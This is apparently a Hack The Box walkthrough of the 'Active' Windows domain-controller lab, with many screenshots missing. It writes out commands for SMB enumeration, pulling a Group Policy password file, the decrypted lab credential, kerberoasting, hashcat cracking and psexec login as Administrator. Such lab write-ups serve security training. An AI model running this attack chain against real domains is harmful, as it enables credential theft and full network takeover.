HTB Series - Active

tags: htb active windows walkthrough

We start by scanning the target with nmap to find open ports
nmap -sC -sV -oA active 10.10.10.100

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Since we can see dns (53), ldap and smb (445) we are likely on a windows server.
Inspecting the output, there are no shares listed, so we can try to connect via smbclient with null authentication to enumerate them.
smbclient -L //10.10.10.100
Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

The IPC$ and SYSVOL shares are expected of a domain controller.

Smbmap offers similar results

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We note that we only have READ access for the Replication share, so we drill down further into it to look for interesting artifacts.

smbmap -H 10.10.10.100 -r Replication --depth 8 # depth accomplishes was recursive would have, 8 in this case was an estimate of how deep we would have to go.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

The output depicts the presence of the Groups.xml file which is of interest to us so we can download it.

smbmap -H 10.10.10.100 -r Replication --depth 8 -A Groups.xml # -A acquires the file with the specified pattern

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

From the downloaded file we identify the credentials as follows:

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We decrypt the password as shown:

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

An alternate way to get this would be to use smbclient

smbclient //10.10.10.100/Replication Password for [WORKGROUP\cypher]: Anonymous login successful Try "help" to get a list of possible commands. smb: \> recurse ON smb: \> prompt OFF smb: \> mget *

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We then use impacket to view the users on the Domain
GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/svc_tgs

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We try further enumeration using the given user account as follows:

smbmap -d active.htb- -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100
# -d is for domain, -u is for user, -p is for password and -H is for Host

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We utilize the credentials gathered as follows:

On a windows box, open up a session as the user

runas /netonly /user:active.htb\svc_tgs cmd

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We can use bloodhound to proceed as follows:
Use sharphound on the windows box

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Verify the connection is working okay

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Turns out we just needed to add the DC as the primary DNS in the ethernet settings.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

From Bloodhound we query which accounts are susceptible to kerberoasting

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Attempt at Kerberoasting

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

From the hash acquired, we can look up on example hashcat hashes to find out the cracking mode to use

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We can then proceed to attempt to crack the hash with hashcat

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We then proceed to use the credentials acquired to login as the Administrator via Psexec
psexec.py domain/User@ip

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Own the root flag

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’